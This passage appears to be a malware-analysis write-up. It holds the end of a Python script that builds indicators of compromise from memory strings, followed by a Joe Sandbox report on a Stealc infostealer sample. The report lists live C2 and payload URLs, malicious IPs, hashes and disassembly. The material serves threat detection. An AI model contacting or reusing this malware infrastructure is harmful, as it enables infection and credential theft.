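IPV4 = re.compile(r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$")
HOSTNAME = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,}$", re.I)
URL = re.compile(r"^(https?://)([^/?#]+)(/[^?#]*)?(\?[^#]*)?$")
# A path is cut right after the first of these extensions (assumed list);
# whatever follows is taken to be bytes that sat behind the string in memory.
RESOURCE = re.compile(r"^(/.*?\.(?:php|exe|dll|zip|html?|js))", re.I)


def valid_host(host):
    return bool(IPV4.match(host) or HOSTNAME.match(host))


def normalize(raw):
    """Return the URL with trailing memory junk removed, or None if not a URL."""
    m = URL.match(raw)
    if not m:
        return None
    scheme, host, path, query = m.groups()
    # Peel characters off the host until it is a valid IPv4 address or
    # hostname ("62.204.41.177S" -> "62.204.41.177").
    while host and not valid_host(host):
        host = host[:-1]
    if not host:
        return None
    path = path or "/"
    r = RESOURCE.match(path)
    if r and len(r.group(1)) < len(path):
        path, query = r.group(1), None  # junk followed the resource name
    return scheme + host.lower() + path + (query or "")


def snap(url, observed):
    """Collapse onto the longest wire-observed URL that is a prefix of the string."""
    hits = [o for o in observed if url.startswith(o)]
    return max(hits, key=len) if hits else url


def build_iocs(memory_strings, observed):
    iocs = defaultdict(lambda: {"sources": set(), "observed": False,
                                "malicious": None, "review": False})
    for raw, source in memory_strings:
        url = normalize(raw)
        if url is None:
            continue
        url = snap(url, observed)
        entry = iocs[url]
        entry["sources"].add(source)
        if url in observed:
            entry["observed"], entry["malicious"] = True, observed[url]
        else:
            # A bare host or a one/two-character path may be the complete string
            # or a truncated endpoint: check the PCAP before using it as a URL IOC.
            entry["review"] = len(url.split("/", 3)[3]) <= 2
    for url, malicious in observed.items():  # keep wire-observed URLs not seen in memory
        iocs[url]["observed"], iocs[url]["malicious"] = True, malicious
    return dict(iocs)


if __name__ == "__main__":
    for url, info in sorted(build_iocs(MEMORY_STRINGS, OBSERVED_URLS).items()):
        flags = [k for k in ("observed", "malicious", "review") if info[k]]
        print(f"{url}  [{', '.join(flags)}]  <- {', '.join(sorted(info['sources']))}")
```

Run as-is, the 21 memory strings collapse to nine IOCs: the C2 gate and its root (both only in A8A9.tmp.exe, both observed and malicious), the payload URL on 176.113.115.37 and the tracking URL on post-to-me.com (both only in jicQJ2cdlM.exe), plus a handful of fragments marked for review. Keeping the source process per IOC preserves the staging the report shows: the loader fetches ScreenUpdateSync.exe and the dropped A8A9.tmp.exe talks to the gate.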
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
176.113.115.37 | unknown | Russian Federation | 49505 | SELECTEL, RU | false
62.204.41.177 | unknown | United Kingdom | 30798 | TNNET-AS TNNet Oy Main network, FI | true
104.21.56.70 | post-to-me.com | United States | 13335 | CLOUDFLARENET, US | false
                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1542867
                                                                    Start date and time:2024-10-26 18:57:14 +02:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 8m 12s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:9
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:jicQJ2cdlM.exe
                                                                    renamed because original name is a hash value
                                                                    Original Sample Name:c26c0c92ef5ad707c6f9dd37b2c016ae.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.evad.winEXE@4/7@1/3
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HCA Information:
                                                                    • Successful, ratio: 98%
                                                                    • Number of executed functions: 52
                                                                    • Number of non-executed functions: 362
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    • VT rate limit hit for: jicQJ2cdlM.exe
Time | Type | Description
12:58:18 | API Interceptor | 9265076x Sleep call for process: jicQJ2cdlM.exe modified
12:58:46 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Context: IPs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
176.113.115.37 | w12rykWq2L.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | jWpgP22dl2.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | mCe4hBfqCT.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | BKoQ3DF8eD.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | v2hvYA53Ys.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | Zl5QaBwsTJ.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | sgM0Akbldk.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | VAIIBIHmtT.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | CHHE6LLjWx.exe | malicious | Stealc, Vidar | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | hlyG1m5UmO.exe | malicious | Stealc, Vidar | 176.113.115.37/seed.exe
62.204.41.177 | c4da1217278a52b300055859db330a4a3dca4ad09fe56.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | w12rykWq2L.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | jWpgP22dl2.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | mCe4hBfqCT.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | Ondso1o6Yz.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | BKoQ3DF8eD.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | ZDW7Di1Ykf.exe | malicious | Stealc, Vidar | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | cdc57Mn7dE.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | v2hvYA53Ys.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | 5ee78ca100f37486e25795012e502d905d864fe4dedf0.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
104.21.56.70 | jWpgP22dl2.exe | malicious | Stealc |
104.21.56.70 | mCe4hBfqCT.exe | malicious | Stealc |
104.21.56.70 | BKoQ3DF8eD.exe | malicious | Stealc |
104.21.56.70 | v2hvYA53Ys.exe | malicious | Stealc |
104.21.56.70 | Zl5QaBwsTJ.exe | malicious | Stealc |
104.21.56.70 | VAIIBIHmtT.exe | malicious | Stealc |
104.21.56.70 | hlyG1m5UmO.exe | malicious | Stealc, Vidar |
Context: Domains
Match | Associated Sample Name / URL | Detection | Threat Name | Context
post-to-me.com | w12rykWq2L.exe | malicious | Stealc | 172.67.179.207
post-to-me.com | jWpgP22dl2.exe | malicious | Stealc | 104.21.56.70
post-to-me.com | mCe4hBfqCT.exe | malicious | Stealc | 104.21.56.70
post-to-me.com | BKoQ3DF8eD.exe | malicious | Stealc | 104.21.56.70
post-to-me.com | v2hvYA53Ys.exe | malicious | Stealc | 104.21.56.70
post-to-me.com | Zl5QaBwsTJ.exe | malicious | Stealc | 104.21.56.70
post-to-me.com | sgM0Akbldk.exe | malicious | Stealc | 172.67.179.207
post-to-me.com | VAIIBIHmtT.exe | malicious | Stealc | 104.21.56.70
post-to-me.com | CHHE6LLjWx.exe | malicious | Stealc, Vidar | 172.67.179.207
post-to-me.com | hlyG1m5UmO.exe | malicious | Stealc, Vidar | 104.21.56.70
Context: ASNs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENET, US | http://cio.krqe.com/gtdhffgjghfj3081868fB16927453Xe78849729yB17367Xb25vBr206268IG | malicious | Unknown | 172.67.189.243
CLOUDFLARENET, US | http://cio.krqe.com/gtdhffgjghfj3081868fB16927453Xe78849729yB17367Xb25vBr206268IG | malicious | Unknown | 172.67.189.243
CLOUDFLARENET, US | Setup.exe | malicious | LummaC | 188.114.97.3
CLOUDFLARENET, US | Setup.exe | malicious | LummaC | 188.114.97.3
CLOUDFLARENET, US | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.95.91
CLOUDFLARENET, US | file.exe | malicious | LummaC | 172.67.170.64
CLOUDFLARENET, US | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.95.91
CLOUDFLARENET, US | w12rykWq2L.exe | malicious | Stealc | 172.67.179.207
CLOUDFLARENET, US | 6VTskjqyxX.exe | malicious | Unknown | 188.114.97.3
CLOUDFLARENET, US | 6VTskjqyxX.exe | malicious | Unknown | 188.114.97.3
SELECTEL, RU | w12rykWq2L.exe | malicious | Stealc | 176.113.115.37
SELECTEL, RU | jWpgP22dl2.exe | malicious | Stealc | 176.113.115.37
SELECTEL, RU | mCe4hBfqCT.exe | malicious | Stealc | 176.113.115.37
SELECTEL, RU | BKoQ3DF8eD.exe | malicious | Stealc | 176.113.115.37
SELECTEL, RU | v2hvYA53Ys.exe | malicious | Stealc | 176.113.115.37
SELECTEL, RU | Zl5QaBwsTJ.exe | malicious | Stealc | 176.113.115.37
SELECTEL, RU | sgM0Akbldk.exe | malicious | Stealc | 176.113.115.37
SELECTEL, RU | VAIIBIHmtT.exe | malicious | Stealc | 176.113.115.37
SELECTEL, RU | la.bot.sh4.elf | malicious | Unknown | 92.53.102.17
SELECTEL, RU | la.bot.powerpc.elf | malicious | Unknown | 95.213.162.65
TNNET-AS TNNet Oy Main network, FI | c4da1217278a52b300055859db330a4a3dca4ad09fe56.exe | malicious | Stealc | 62.204.41.177
TNNET-AS TNNet Oy Main network, FI | w12rykWq2L.exe | malicious | Stealc | 62.204.41.177
TNNET-AS TNNet Oy Main network, FI | jWpgP22dl2.exe | malicious | Stealc | 62.204.41.177
TNNET-AS TNNet Oy Main network, FI | mCe4hBfqCT.exe | malicious | Stealc | 62.204.41.177
TNNET-AS TNNet Oy Main network, FI | Ondso1o6Yz.exe | malicious | Stealc | 62.204.41.177
TNNET-AS TNNet Oy Main network, FI | BKoQ3DF8eD.exe | malicious | Stealc | 62.204.41.177
TNNET-AS TNNet Oy Main network, FI | ZDW7Di1Ykf.exe | malicious | Stealc, Vidar | 62.204.41.177
TNNET-AS TNNet Oy Main network, FI | cdc57Mn7dE.exe | malicious | Stealc | 62.204.41.177
TNNET-AS TNNet Oy Main network, FI | v2hvYA53Ys.exe | malicious | Stealc |
                                                                                  • 62.204.41.177
                                                                                  5ee78ca100f37486e25795012e502d905d864fe4dedf0.exeGet hashmaliciousStealcBrowse
                                                                                  • 62.204.41.177
Associated Sample Name / URL | Detection | Threat Name | Context (rows grouped by Match)

Match: 37f463bf4616ecd445d4a1937da06e19
ae67deafb5d9386fbca3d4d728d79651daaa42eef8086.exe | malicious | Stealc, Vidar | 104.21.56.70
w12rykWq2L.exe | malicious | Stealc | 104.21.56.70
jWpgP22dl2.exe | malicious | Stealc | 104.21.56.70
1GeaC4QnFy.dll | malicious | CobaltStrike | 104.21.56.70
OyPpyRRqd8.dll | malicious | CobaltStrike | 104.21.56.70
mCe4hBfqCT.exe | malicious | Stealc | 104.21.56.70
H33UCslPzv.exe | malicious | XWorm | 104.21.56.70
factura Fvsae2400398241025.pdf.exe | malicious | FormBook, GuLoader | 104.21.56.70
SecuriteInfo.com.Program.Unwanted.5510.8307.25058.exe | malicious | Unknown | 104.21.56.70
BKoQ3DF8eD.exe | malicious | Stealc | 104.21.56.70
No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9640681542158469
Encrypted: false
SSDEEP: 192:WEZndtb0qfEPjMhZrMZtzuiFkZ24IO89:BZdtoqfEPjjTzuiFkY4IO89
MD5: B781BE33E1F305DA76FEFC8AB36A6E33
SHA1: F7F9FC6BB2E3D64068015806D7BD340FD378FC12
SHA-256: 5A5204B3D3C48C3713861743BAAAC4BB0EEB8A6E48FFC1184B89652EAB708EA8
SHA-512: FB9F940FDCA8AA3AC1F6932CB1FC9669B6282F7695646A501480D66D4CFC45EE9B9D9ECF2729DDF81415BA1D0303C6DD46343EA36F6618F540FBD1024C35D239
Malicious: false
Reputation: low

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 14 streams, Sat Oct 26 16:58:28 2024, 0x1205a4 type
Category: dropped
Size (bytes): 60614
Entropy (8bit): 1.9244435090311371
Encrypted: false
SSDEEP: 192:bO3ZdXsTPAlCZXRgMbOEOJwpBBeQV3RXO05qvF99sIsfVacvHHozGNtQDHZXb31I:K3ZqPgTEE+BB9JpOwUF9cHIKcdRvFq
MD5: 208F86C38E86EECB5988AF173A5268DD
SHA1: F1C51C18DCE884FEF59D47F99B485CD8A8178DA2
SHA-256: 588EF0F73BA532AC73B34284AE78F9528C5E8F191B87E960BDA75C251E95601E
SHA-512: 4C182DEA5AACD741C339D4713DE8433C9249A215A4835F526B7FFD0AD9AA2B417B8A14C95A06A63E33523717A34FECDC86130E6A96BC13600471D9D9B709895F
Malicious: false
Reputation: low

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8312
Entropy (8bit): 3.6975553628280697
Encrypted: false
SSDEEP: 192:R6l7wVeJhWV6bRg6YjR6HyNgmfxqpDT89bCfsf8Wm:R6lXJy6bRg6Y16YgmfxDCEfE
MD5: 68FB84AC417ACC2AFFACE4C38241A8CB
SHA1: BFF63D07E7BD448BBEEA561B561469714D940D30
SHA-256: 4E93442A9C9DDCDF239DB36141BEB4F0774BBD37B178A095285E04DDA63324DB
SHA-512: 7CC0673C73F3B375EAA88A9317340BDD0ED1F2C5ED4FFD672844451219DF83E8A40901709F04C54D2BC9DA3B78AFC3484182B03C42A4618D281B92871641F66C
Malicious: false
Reputation: low

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4565
Entropy (8bit): 4.4414685388279995
Encrypted: false
SSDEEP: 48:cvIwWl8zsEJg77aI9M/WpW8VYiYm8M4J966FsX+q8CGvV5q7BUEd:uIjfCI7Ou7VKJcjXivV5q7BUEd
MD5: 2AE577C2BAFACE5C9307EA4511D09601
SHA1: B7DD71AB15AFA077A160A53D21F73B24450F1922
SHA-256: 001F19C1A516ED2B5177AF9DD939451CA17D77BC8C693B97C51D0308903FD300
SHA-512: D1A8C7371502BAA9B62B6A601A5FADB502F52573883E03532930022C991FF5F591DD44951D820A8B8AC47E3C1FC5361321EABEECEEACC8D4500D2A9E31D3C7E0
Malicious: false
Reputation: low

Process: C:\Users\user\Desktop\jicQJ2cdlM.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 402432
Entropy (8bit): 6.6214870089703375
Encrypted: false
SSDEEP: 6144:aLoOrrA59Zbm4mbZJSeWnFcmw4iD8VYwmAgFl7gVWbfonBeao:a5r2Dbm4mbJWnFoYVrVWbfy
MD5: 085DE763171FBBAFEAC2CDB972AACC2A
SHA1: E4762C69C5D84E56FB386FAC56015D3F58351F9B
SHA-256: DD4A5EFC48BBD0ED6AD6AAB7220CAB9F5BF0FF1FD47F5594BA67AE122CBF026F
SHA-512: 9DE251FEDE114A679632377677751F7427C03865AABF2A6733AC22B9AE03E76645DA2BD626C55345ACDFE5CAF704A2DBA475B1B7FF911AFD38061CD13CA344AC
Malicious: true
Antivirus:
• Avira, Detection: 100%
• Joe Sandbox ML, Detection: 100%
• ReversingLabs, Detection: 34%
Reputation: low

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 1835008
Entropy (8bit): 4.465447894538723
Encrypted: false
SSDEEP: 6144:YIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN0dwBCswSbq:NXD94+WlLZMM6YFHi+q
MD5: 521891CC9B784FBA49912302390F94F3
SHA1: 2F4FC17694FE2507775D293E49323EE9C38341CD
SHA-256: CFB1D2C0BC80F06329CB79703B1BC49067712253F551A8A030845E8FD808AF52
SHA-512: 9537FB0E2983F65B120FAD74A9E67B472DDAA56F4E39FE916CE2081977963CEF75DD4E609A2F8F5FFD7507DF28F54B0C8B251EB525B24F62346333084AFA928D
Malicious: false
Reputation: low

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.000711579734672
TrID:
• Win32 Executable (generic) a (10002005/4) 99.53%
• InstallShield setup (43055/19) 0.43%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: jicQJ2cdlM.exe
File size: 480'256 bytes
MD5: c26c0c92ef5ad707c6f9dd37b2c016ae
SHA1: 7269e1394aeb4bb014babee479e7a520a7bfe6d0
SHA256: 9cebd9110296bdd93cb0d23ed1a591d097a49f3827b364daf44615885dbdcff7
SHA512: 7d45dd2ad5ee7d0bd397dba4f1dbf26115a310e075749779346151881cbfbb23e6044e97eaeddcb88a55e3ee9df96753bd1a8ae857d013d6c2f96c19e63c523c
SSDEEP: 6144:UZev6raGHzfg5cJswyMjOobVccxyeGGmFCbUXJarRr7SQrh2onv1qK2o:Dr+zfrssOobVccMZUPrRfSUAe1
TLSH: C5A4AE2261F16817EAB76B315D3BC6ECE66BBC62DE3D515D62107E4F09733B08922312
Icon Hash: 46c7c30b0f4e0d19
Entrypoint: 0x4016ea
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x64CBC631 [Thu Aug 3 15:22:25 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: 52fddc1eda435b57eceba5ccd18749d5
Instruction:
call 00007F809C524568h
jmp 00007F809C520EFDh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00453778h], eax
mov dword ptr [00453774h], ecx
mov dword ptr [00453770h], edx
mov dword ptr [0045376Ch], ebx
mov dword ptr [00453768h], esi
mov dword ptr [00453764h], edi
mov word ptr [00453790h], ss
mov word ptr [00453784h], cs
mov word ptr [00453760h], ds
mov word ptr [0045375Ch], es
mov word ptr [00453758h], fs
mov word ptr [00453754h], gs
pushfd
pop dword ptr [00453788h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0045377Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00453780h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0045378Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [004536C8h], 00010001h
mov eax, dword ptr [00453780h]
mov dword ptr [0045367Ch], eax
mov dword ptr [00453670h], C0000409h
mov dword ptr [00453674h], 00000001h
mov eax, dword ptr [00452004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00452008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000F0h]

Programming Language:
• [C++] VS2008 build 21022
• [ASM] VS2008 build 21022
                                                                                  • [ C ] VS2008 build 21022
                                                                                  • [IMP] VS2005 build 50727
                                                                                  • [RES] VS2008 build 21022
                                                                                  • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x50bec | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x132000 | 0x204f8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x50788 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x4f000 | 0x1b4 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x4d66c | 0x4d800 | 7e1a620d1d022cb9028744943ec60047 | False | 0.8659022177419354 | data | 7.652676977218571 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x4f000 | 0x25d0 | 0x2600 | d9c273b72708b7cab8a887821a7ce2b6 | False | 0.38394325657894735 | data | 5.518935144590462 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x52000 | 0xdf978 | 0x4c00 | 0c0fe7b84e10174199728dd015160aa0 | False | 0.08588610197368421 | data | 0.9993086920896931 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x132000 | 0x204f8 | 0x20600 | 9f1dc738eeec05f5a9c125a89a0d879b | False | 0.4799333373552124 | data | 5.410863104938252 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x14a5e8 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.7368421052631579
RT_CURSOR | 0x14a718 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.06130705394190871
RT_ICON | 0x132ac0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkish | Turkey | 0.5565031982942431
RT_ICON | 0x133968 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkish | Turkey | 0.6304151624548736
RT_ICON | 0x134210 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkish | Turkey | 0.6762672811059908
RT_ICON | 0x1348d8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkish | Turkey | 0.736271676300578
RT_ICON | 0x134e40 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Turkish | Turkey | 0.5033195020746888
RT_ICON | 0x1373e8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkish | Turkey | 0.5968574108818011
RT_ICON | 0x138490 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkish | Turkey | 0.5926229508196721
RT_ICON | 0x138e18 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkish | Turkey | 0.7331560283687943
RT_ICON | 0x1392f8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkish | Turkey | 0.3358208955223881
RT_ICON | 0x13a1a0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkish | Turkey | 0.39395306859205775
RT_ICON | 0x13aa48 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkish | Turkey | 0.3957373271889401
RT_ICON | 0x13b110 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkish | Turkey | 0.4060693641618497
RT_ICON | 0x13b678 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Turkish | Turkey | 0.22095435684647302
RT_ICON | 0x13dc20 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Turkish | Turkey | 0.24835834896810507
RT_ICON | 0x13ecc8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Turkish | Turkey | 0.28647540983606556
RT_ICON | 0x13f650 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Turkish | Turkey | 0.3147163120567376
RT_ICON | 0x13fb30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Turkish | Turkey | 0.39019189765458423
RT_ICON | 0x1409d8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Turkish | Turkey | 0.5464801444043321
RT_ICON | 0x141280 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Turkish | Turkey | 0.6094470046082949
RT_ICON | 0x141948 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Turkish | Turkey | 0.6401734104046243
RT_ICON | 0x141eb0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Turkish | Turkey | 0.4101782363977486
RT_ICON | 0x142f58 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Turkish | Turkey | 0.39959016393442626
RT_ICON | 0x1438e0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Turkish | Turkey | 0.44858156028368795
RT_ICON | 0x143db0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkish | Turkey | 0.8224946695095949
RT_ICON | 0x144c58 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkish | Turkey | 0.8664259927797834
RT_ICON | 0x145500 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkish | Turkey | 0.8058755760368663
RT_ICON | 0x145bc8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkish | Turkey | 0.7969653179190751
RT_ICON | 0x146130 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Turkish | Turkey | 0.804149377593361
RT_ICON | 0x1486d8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkish | Turkey | 0.8327861163227017
RT_ICON | 0x149780 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkish | Turkey | 0.8426229508196721
RT_ICON | 0x14a108 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkish | Turkey | 0.8537234042553191
RT_STRING | 0x14ce98 | 0x9a | data | | | 0.6038961038961039
RT_STRING | 0x14cf38 | 0x6da | data | | | 0.4264538198403649
RT_STRING | 0x14d618 | 0x4aa | data | | | 0.4455611390284757
RT_STRING | 0x14dac8 | 0x4dc | data | | | 0.4429260450160772
RT_STRING | 0x14dfa8 | 0x7d4 | data | | | 0.41966067864271456
RT_STRING | 0x14e780 | 0x718 | data | | | 0.42841409691629956
RT_STRING | 0x14ee98 | 0x696 | data | | | 0.4359430604982206
RT_STRING | 0x14f530 | 0x616 | data | | | 0.43902439024390244
RT_STRING | 0x14fb48 | 0x7de | data | | | 0.41807348560079444
RT_STRING | 0x150328 | 0x5c6 | data | | | 0.4370771312584574
RT_STRING | 0x1508f0 | 0x5d8 | data | | | 0.44385026737967914
RT_STRING | 0x150ec8 | 0x588 | data | | | 0.4392655367231638
RT_STRING | 0x151450 | 0x616 | data | | | 0.43838254172015406
RT_STRING | 0x151a68 | 0x4ee | data | | | 0.4548335974643423
RT_STRING | 0x151f58 | 0x5a0 | data | | | 0.4354166666666667
RT_GROUP_CURSOR | 0x14ccc0 | 0x22 | data | | | 1.0588235294117647
